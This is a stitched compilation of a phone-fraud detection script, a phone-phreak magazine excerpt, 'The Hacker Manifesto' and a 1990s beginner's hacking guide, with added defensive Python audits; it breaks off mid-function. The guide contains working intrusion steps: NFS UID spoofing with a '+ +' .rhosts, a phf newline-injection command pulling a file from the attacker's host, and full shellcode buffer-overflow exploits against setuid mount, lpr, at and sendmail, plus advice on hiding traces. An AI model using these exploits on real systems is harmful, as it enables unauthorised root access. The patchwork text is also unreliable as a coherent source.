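    ("504-555-0101", "800-555-0199", 7200),   # two hours on a toll-free number
    ("504-555-0101", "800-555-0188", 5400),   # and again, to another 800 number
    ("504-555-0102", "216-555-1212", 45),     # brief directory-assistance call
    ("504-555-0102", "216-555-1212", 7300),   # two hours on Akron information
    ("504-555-0103", "212-555-0155", 600),    # ordinary billed toll call
]

TOLL_FREE_PREFIX = "800-"
DIRECTORY_ASSISTANCE_SUFFIX = "555-1212"


@dataclass(frozen=True)
class Finding:
    line: str
    dialed: str
    seconds: int
    reason: str


def is_toll_free(number):
    return number.startswith(TOLL_FREE_PREFIX)


def is_directory_assistance(number):
    return number.endswith(DIRECTORY_ASSISTANCE_SUFFIX)


def flag_calls(cdrs, max_toll_free_seconds=1800, max_da_seconds=600):
    """Per-call check: toll-free calls that run far longer than a normal
    800-number conversation, and directory-assistance calls that could not
    plausibly be someone asking for a number."""
    findings = []
    for line, dialed, seconds in cdrs:
        if is_toll_free(dialed) and seconds > max_toll_free_seconds:
            findings.append(Finding(line, dialed, seconds, "long toll-free call"))
        elif is_directory_assistance(dialed) and seconds > max_da_seconds:
            findings.append(Finding(line, dialed, seconds, "long directory-assistance call"))
    return findings


def repeat_offenders(cdrs, min_findings=2, **thresholds):
    """Per-line check: a line that trips the per-call rule repeatedly is a
    stronger signal than one long call, which could be a genuine hold queue."""
    counts = Counter(f.line for f in flag_calls(cdrs, **thresholds))
    return sorted(line for line, n in counts.items() if n >= min_findings)
```

The per-call rule is the one the article attributes to the anti-fraud program; the per-line aggregation is what turns a single odd call into something worth a security agent's time rather than a false alarm.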
CAPTAIN CRUNCH DEMONSTRATES HIS FAMOUS UNIT
There is an underground telephone network in this country. Gilbertson
discovered it the very day news of his activities hit the papers. That
evening his phone began ringing. Phone phreaks from Seattle, from Florida,
from New York, from San Jose, and from Los Angeles began calling him and
telling him about the phone-phreak network. He'd get a call from a phone
phreak who'd say nothing but, "Hang up and call this number."
When he dialed the number he'd find himself tied into a conference of a
dozen phone phreaks arranged through a quirky switching station in British
Columbia. They identified themselves as phone phreaks, they demonstrated
their homemade blue boxes which they called "MFers" (for multi-frequency,
among other things) for him, they talked shop about phone phreak devices.
They let him in on their secrets on the theory that if the phone company was
after him he must be trustworthy. And, Gilbertson recalls, they stunned him
with their technical sophistication.
I ask him how to get in touch with the phone-phreak network. He digs around
through a file of old schematics and comes up with about a dozen numbers in
three widely separated area codes.
"Those are the centers," he tells me. Alongside some of the numbers he
writes in first names or nicknames: names like Captain Crunch, Dr. No, Frank
Carlson, (also a code word for free call), Marty Freeman (code word for MF
device), Peter the Perpendicular Pimple, Alefnull, and The Cheshire Cat. He
makes checks alongside the names of those among these top twelve who are
blind. There are five checks.
I ask him who this Captain Crunch person is.
"Oh, The Captain. He's probably the most legendary phone phreak. He calls
himself Captain Crunch after the notorious Cap'n Crunch 2600 whistle.
Several years ago the makers of Cap'n Crunch breakfast cereal offered a toy
whistle prize in every box as a treat for the Cap'n Crunch set. Somehow a
phone phreak discovered that the toy whistle just happened to produce a
perfect 2600-cycle tone. When the man who calls himself Captain Crunch was
transferred overseas to England with his Air Force unit, he would receive
scores of calls from his friends and "mute" them, that is, make them free of
charge to them, by blowing his Cap'n Crunch whistle into his end."
"Captain Crunch is one of the older phone phreaks," Gilbertson tells me.
"He's an engineer who once got in a little trouble for fooling around with
the phone, but he can't stop. Well, this guy drives across country in a
Volkswagen van with an entire switchboard and a computerized
super-sophisticated MFer in the back. He'll pull up to a phone booth on a
lonely highway somewhere, snake a cable out of his bus, hook it onto the
phone and sit for hours, days sometimes, sending calls zipping back and
forth across the country, all over the world."
Back at my house, I dialed the number he gave me for "Captain Crunch" and
asked for Gary Thomas, his real name, or at least the name he uses when he's
not dashing into a phone booth beeping out MF tones faster than a speeding
bullet, and zipping phantomlike through the phone company's long-distance
lines.
When Gary answered the phone and I told him I was preparing a text file
about phone phreaks, he became very indignant.
"I don't do that. I don't do that anymore at all. And if I do it, I do it
for one reason and one reason only. I'm learning about a system. The phone
company is a system. A computer is a system. Do you understand? If I do what
I do, it is only to explore a System. Computers. Systems. That's my bag. The
phone company is nothing but a computer."
A tone of tightly restrained excitement enters the Captain's voice when he
starts talking about Systems. He begins to pronounce each syllable with the
hushed deliberation of an obscene caller.
"Ma Bell is a system I want to explore. It's a beautiful system, you know,
but Ma Bell screwed up. It's terrible because Ma Bell is such a beautiful
system but she screwed up. I learned how she screwed up from a couple of
blind kids who wanted me to build a device. A certain device. They said it
could make free calls. But when these blind kids told me I could make calls
into a computer, my eyes lit up. I wanted to learn about computers. I wanted
to learn about Ma Bell's computers. So I built the little device. Only I
built it wrong and Ma Bell found out. Ma Bell can detect things like that.
Ma Bell knows. So I'm strictly out of it now. I don't do it. Except for
learning purposes." He pauses. "So you want to write a text file. Are you
paying for this call? Hang up and call this number."
He gives me a number in an area code a thousand miles north of his own. I
dial the number.
"Hello again. This is Captain Crunch. You are speaking to me on a toll-free
loop in Portland Oregon. Do you know what a toll-free loop is? I'll tell
you."
He explains to me that almost every exchange in the country has open test
numbers which allow other exchanges to test their connections with it. Most
of these numbers occur in consecutive pairs, such as 302 956-0041 and
956-0042. Well, certain phone phreaks discovered that if two people from
anywhere in the country dial those two consecutive numbers, they can talk
together just as if one had called the other's number, with no charge to
either of them, of course.
"Your voice is looping around in a 4A switching machine up there in Canada,
zipping back down to me," the Captain tells me. "My voice is looping around
up there and back down to you. And it can't ever cost anyone money. The
phone phreaks and I have compiled a list of many many of these numbers. You
would be surprised if you saw the list. I could show it to you. But I won't.
I'm out of that now. I'm not out to screw Ma Bell. I know better. If I do
anything it's for the pure knowledge of the System. You can learn to do
fantastic things. Have you ever heard eight tandems stacked up? Do you know
the sound of tandems stacking and unstacking? Give me your phone number.
Hang up now and wait a minute."
Slightly less than a minute later the phone rang and the Captain was on the
line, his voice sounding far more excited, almost aroused.
"I wanted to show you what it's like to stack up tandems (Whenever the
Captain says "stack up" he sounds like he is smacking his lips)."
"How do you like the connection you're on now?" the Captain asks me. "It's a
raw tandem. A raw tandem. I'm going to show you what it's like to stack up.
Blow off. Land in a faraway place. To stack that tandem up, whip back and
forth across the country a few times, then shoot on up to Moscow."
"Listen," Captain Crunch continues. "Listen. I've got a line tie on my
switchboard here, and I'm gonna let you hear me stack and unstack tandems.
Listen to this. I'm gonna blow your mind."
First I hear a super rapid-fire pulsing of flutelike phone tones, then a
pause, then another popping burst of tones, then another, then another. Each
burst is followed by a beep-kachink sound.
"We have now stacked up four tandems," said Captain Crunch, sounding
somewhat remote. "That's four tandems stacked up. Do you know what that
means? That means I'm whipping back and forth, back and forth twice, across
the country, before coming to you. I've been known to stack up twenty
tandems at a time. Now, just like I said, I'm going to shoot up to Moscow."
There is a new longer series of beeper pulses over the line, a brief
silence, then a ring.
"Hello," answers a far-off voice.
"Hello, Is this the American Embassy Moscow?"
"Yes, sir, who is calling?" says the voice.
"Yes, This is test board here in New York. We're calling to check out the
circuits, see what kind of lines you've got. Everything okay there in
Moscow?"
"Okay?"
"Well, yes, how are things there?"
"Oh. Well everything's okay, I guess."
"Okay. Thank you." They hang up, leaving a confused series of beep-kachink
sounds hanging in mid-ether in the wake of the call before dissolving away.

Hackers Manifesto -
Another one got caught today, it's all over the papers. "Teenager Arrested
in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain, ever
take a look behind the eyes of the hacker? Did you ever wonder what made
him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain for the
fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I
didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It
does what I want it to. If it makes a mistake, it's because I screwed it up.
Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through the
phone line like heroin through an addict's veins, an electronic pulse is sent
out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to them,
may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at school
when we hungered for steak... the bits of meat that you did let slip through
were pre-chewed and tasteless. We've been dominated by sadists, or ignored
by the apathetic. The few that had something to teach found us willing
pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty
of the baud. We make use of a service already existing without paying for
what could be dirt-cheap if it wasn't run by profiteering gluttons, and you
call us criminals. We explore... and you call us criminals. We seek after
knowledge... and you call us criminals. We exist without skin color, without
nationality, without religious bias... and you call us criminals. You build
atomic bombs, you wage wars, you murder, cheat, and lie to us and try to
make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of
judging people by what they say and think, not what they look like. My
crime is that of outsmarting you, something that you will never forgive me
for.
I am a hacker, and this is my manifesto. You may stop this individual, but
you can't stop us all... after all, we're all alike.
+++The Mentor+++

The Newbies-User's Guide to Hacking

User's guide
__________________________

Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press .

Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactly for beginners, but it'll have to do.
What all hackers have to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactly what I meant.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem in most
SunOS versions that could allow a remote attacker to add a .rhosts to a user's
home directory... (That was possible if the site had exported its home
directories over NFS.)
Let's see what happens...


mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might
forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$
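The method above works for two reasons: the home directories were exported to every host, and an NFS client, not the server, decides which UID its requests carry, so a local passwd entry with uid 102 is all it takes to write into rapper's home; the `+ +` in .rhosts then trusts every user on every host. The following is an added audit, not the guide's own code, that parses `showmount -e` output and .rhosts contents for exactly those two conditions; the inputs are constructed to mirror the transcript.

```python
"""NFS export and .rhosts audit: added example, not the guide's own code.
The inputs are constructed to mirror the transcript above."""
import re

# Constructed `showmount -e` output, as in the transcript.
SHOWMOUNT_OUTPUT = """\
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
"""

# Constructed .rhosts files: the wildcard the guide writes, and a strict one.
RHOSTS_WILDCARD = "+ +\n"
RHOSTS_STRICT = "admin.site.com alice\n"

EXPORT_LINE = re.compile(r"^(\S+)\s+(.+)$")


def parse_showmount(text):
    """Map each exported path to its client list ('(everyone)' is how
    showmount prints an unrestricted export)."""
    exports = {}
    for raw in text.splitlines():
        m = EXPORT_LINE.match(raw.strip())
        if m:
            exports[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
    return exports


def _is_home_export(path):
    return path == "/" or path.startswith(("/home", "/export/home"))


def audit_exports(text):
    """Flag exports open to every host. Home directories rate 'high':
    an NFS client chooses its own UIDs, so any host that can mount the
    export can write as any non-root user in it."""
    findings = []
    for path, clients in parse_showmount(text).items():
        if "(everyone)" in clients or "*" in clients:
            severity = "high" if _is_home_export(path) else "medium"
            findings.append((path, severity, "exported to every host"))
    return findings


def audit_rhosts(text):
    """Flag host or user wildcards in an .rhosts file; '+ +' trusts
    everyone from everywhere, which is what the guide plants."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+":
            findings.append((n, "any host trusted"))
        if user == "+":
            findings.append((n, "any user trusted"))
    return findings
```

Treat a home-directory export to `(everyone)` as high severity regardless of squash options: `root_squash` only remaps UID 0, and an unrestricted client can present any other UID it likes. The fix is to restrict exports to named hosts (or not export home directories at all) and to disable rhosts-based login on the hosts concerned.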

This is the first method...
Another method could be to see if the site has an open port 80. That would
mean that the site has a web page.
(And that's very bad, 'cuz it's usually vulnerable).
Below I include the source of a scanner that helped me before NMAP was written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that can even do stealth scanning, so lots of systems won't
log it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */
/* The header names in the original include lines were lost when this page
   was extracted; they are restored here from the functions the program uses. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    struct hostent *host;
    int err, i, net;
    struct sockaddr_in sa;

    if (argc != 2) {
        printf("Usage: %s hostname\n", argv[0]);
        exit(1);
    }

    /* Try a full TCP connect() to every privileged port in turn. */
    for (i = 1; i < 1024; i++) {
        memset(&sa, 0, sizeof sa);
        sa.sin_family = AF_INET;
        if (isdigit((unsigned char)*argv[1]))
            sa.sin_addr.s_addr = inet_addr(argv[1]);
        else if ((host = gethostbyname(argv[1])) != 0)
            /* memcpy, not strncpy: the address is binary and may contain zero bytes */
            memcpy(&sa.sin_addr, host->h_addr, sizeof sa.sin_addr);
        else {
            herror(argv[1]);
            exit(2);
        }
        sa.sin_port = htons(i);
        net = socket(AF_INET, SOCK_STREAM, 0);
        if (net < 0) {
            perror("\nsocket");
            exit(2);
        }
        err = connect(net, (struct sockaddr *) &sa, sizeof sa);
        if (err < 0) {
            /* refused or timed out: print on one line and overwrite it next round */
            printf("%s %-5d %s\r", argv[1], i, strerror(errno));
            fflush(stdout);
        } else {
            printf("%s %-5d accepted. \n", argv[1], i);
            if (shutdown(net, 2) < 0) {
                perror("\nshutdown");
                exit(2);
            }
        }
        close(net);
    }
    printf(" \r");
    fflush(stdout);
    return (0);
}
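The scanner above completes a TCP connect() to each port in turn, so every attempt shows up wherever the target logs accepted connections; the stealth scans mentioned for NMAP avoid the completed handshake and hence application-level logs, but a packet filter or IDS that logs the initial SYN still sees the same one-source-many-ports pattern. The following is an added example, not from the page, that finds that pattern in constructed packet-filter log lines; the log format, the addresses and the thresholds are assumptions made for the example.

```python
"""Connect-scan detection over packet-filter log lines: added example, not
from the page. Log format, addresses and thresholds are constructed."""
import re
from datetime import datetime, timedelta

# Assumed log format: ISO timestamp, source, destination, port, TCP flags.
LINE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) flags=(?P<flags>\S+)$")


def _build_sample_log():
    base = datetime(1995, 9, 15, 10, 0, 0)
    lines = []
    # One host walks ports 1..30 in order, one per second: a tcpprobe-style sweep.
    for i in range(1, 31):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} src=192.0.2.10 dst=198.51.100.7 dport={i} flags=S")
    # An ordinary client: repeated web and mail connections over the same minute.
    for i in range(0, 12):
        ts = (base + timedelta(seconds=5 * i)).isoformat()
        port = 80 if i % 4 else 25
        lines.append(f"{ts} src=192.0.2.20 dst=198.51.100.7 dport={port} flags=S")
    lines.append("unparseable line that a real log would also contain")
    return lines


SAMPLE_LOG = _build_sample_log()   # constructed input


def parse_line(line):
    """One log line to a dict, or None for lines that don't match the format."""
    m = LINE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"]), "flags": m["flags"]}


def port_scan_sources(lines, window=timedelta(seconds=60), min_ports=20):
    """Return [(src, distinct_ports)] for sources that touched at least
    min_ports distinct destination ports within any single time window.
    Distinct ports, not connection count, is what separates a sweep from a
    busy but legitimate client."""
    by_src = {}
    for ev in filter(None, map(parse_line, lines)):
        by_src.setdefault(ev["src"], []).append(ev)
    hits = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        best = 0
        for i, start in enumerate(evs):
            ports = {e["dport"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            best = max(best, len(ports))
        if best >= min_ports:
            hits.append((src, best))
    return sorted(hits)
```

The sliding window matters: a sweep of 1023 ports spread over a day at one port per minute would fall below any per-minute threshold, so in practice a second, longer window with a lower rate is run alongside this one.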

Well, now be very careful with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
syntax: lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" nc -v - 20 victim1.site.com 80

then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#
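The phf request above works because the CGI URL-decoded the Qalias parameter and spliced it into a shell command line; its escaping routine backslashed the usual shell metacharacters but not newline, so the decoded %0a ended the finger command and started a second command chosen by the requester. The following is an added example, not the page's code, showing the vulnerable construction beside the hardened form: the vulnerable function only returns the command string it would have run, and the safe form allowlists the value and passes it as a single argv element with no shell. The finger path and the alias syntax are assumptions.

```python
"""Command injection through a CGI query, vulnerable beside hardened:
added example, not the page's code. The alias syntax and the finger path
are stand-ins; nothing here executes a command."""
import re
from urllib.parse import unquote

# The classic blocklist escaper: shell metacharacters get a backslash, but
# newline was left off the list, which is exactly what %0a exploits.
BLOCKLIST = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd_blocklist(s):
    return "".join("\\" + c if c in BLOCKLIST else c for c in s)


def build_finger_command_vulnerable(qalias_raw):
    """How a phf-style CGI built its command: URL-decode the parameter,
    escape the characters it thought of, splice into one shell line.
    Returned as a string, never run."""
    alias = escape_shell_cmd_blocklist(unquote(qalias_raw))
    return f"/usr/bin/finger {alias}"


def shell_would_split(command):
    """An unescaped newline means the shell sees more than one command;
    this is the property the blocklist fails to rule out."""
    return "\n" in command


ALIAS_OK = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def build_finger_argv_safe(qalias_raw):
    """Hardened form: allowlist the decoded value, then pass it as one argv
    element (subprocess.run(argv) with no shell), so nothing in it can be
    interpreted as shell syntax."""
    alias = unquote(qalias_raw)
    if not ALIAS_OK.fullmatch(alias):
        raise ValueError("alias rejected: %r" % alias)
    return ["/usr/bin/finger", alias]
```

The lesson generalises past phf: a blocklist of "dangerous characters" is only as complete as the author's memory of the shell grammar, whereas an allowlist plus an argv array removes the shell from the path entirely.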

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (Besides, if you can finger the site, you can
figure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site.)


Step 2: Hacking r00t.
______

First you have to find out which system it's running...
a). LINUX
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include
#include
#include
#include
#include

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}

/*LPR exploit:I don't know the author...*/

#include
#include
#include

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}

void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}


b.) Versions 1.2.* to 1.3.2
NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include
#include
#include
#include
#include

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);


for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
setenv("NLSPATH",buff,1);
execl(path, "at",NULL);
}

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

/* SENDMAIL Exploit for Linux
*/

#include
#include
#include
#include
#include

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);


for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
setenv("NLSPATH",buff,1);
execl(path, "sendmail",NULL);
}
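The mount, lpr, at and sendmail exploits above all hand the target the same thing: a value of about a kilobyte, built from 0x90 NOP bytes, a short code stub and a repeated stack address, delivered either as a command-line argument or through the NLSPATH environment variable to a set-user-ID program that copies it into a fixed-size buffer. The following is an added example, not from the page, of the checks a privileged program (or a host monitor inspecting process arguments and environments) can apply to such values: a length limit, a printable-bytes rule and a NOP-sled heuristic, plus an environment allowlist. The sample value imitates the exploits' buffer layout with filler in place of any code; the names, limits and allowlist are assumptions.

```python
"""Input checks against the exploit shape above: added example, not the
page's code. The sample value is a constructed imitation of the exploit
buffers (NOP bytes, filler and a repeated address) with no code in it."""
NOP = 0x90


def longest_nop_run(data):
    run = best = 0
    for b in data:
        run = run + 1 if b == NOP else 0
        best = max(best, run)
    return best


def is_printable_ascii(data):
    return all(0x20 <= b < 0x7F for b in data)


def check_value(name, value, max_len=255, sled_len=64):
    """Reasons a setuid program (or a monitor looking at its environment)
    should refuse this argv/env value. An empty list means it looks normal."""
    reasons = []
    if len(value) > max_len:
        reasons.append(f"{name}: length {len(value)} exceeds {max_len}")
    if not is_printable_ascii(value):
        reasons.append(f"{name}: non-printable bytes")
    if longest_nop_run(value) >= sled_len:
        reasons.append(f"{name}: run of {longest_nop_run(value)} NOP bytes")
    return reasons


def scrub_environment(env, allowed=(b"PATH", b"TERM", b"HOME", b"USER")):
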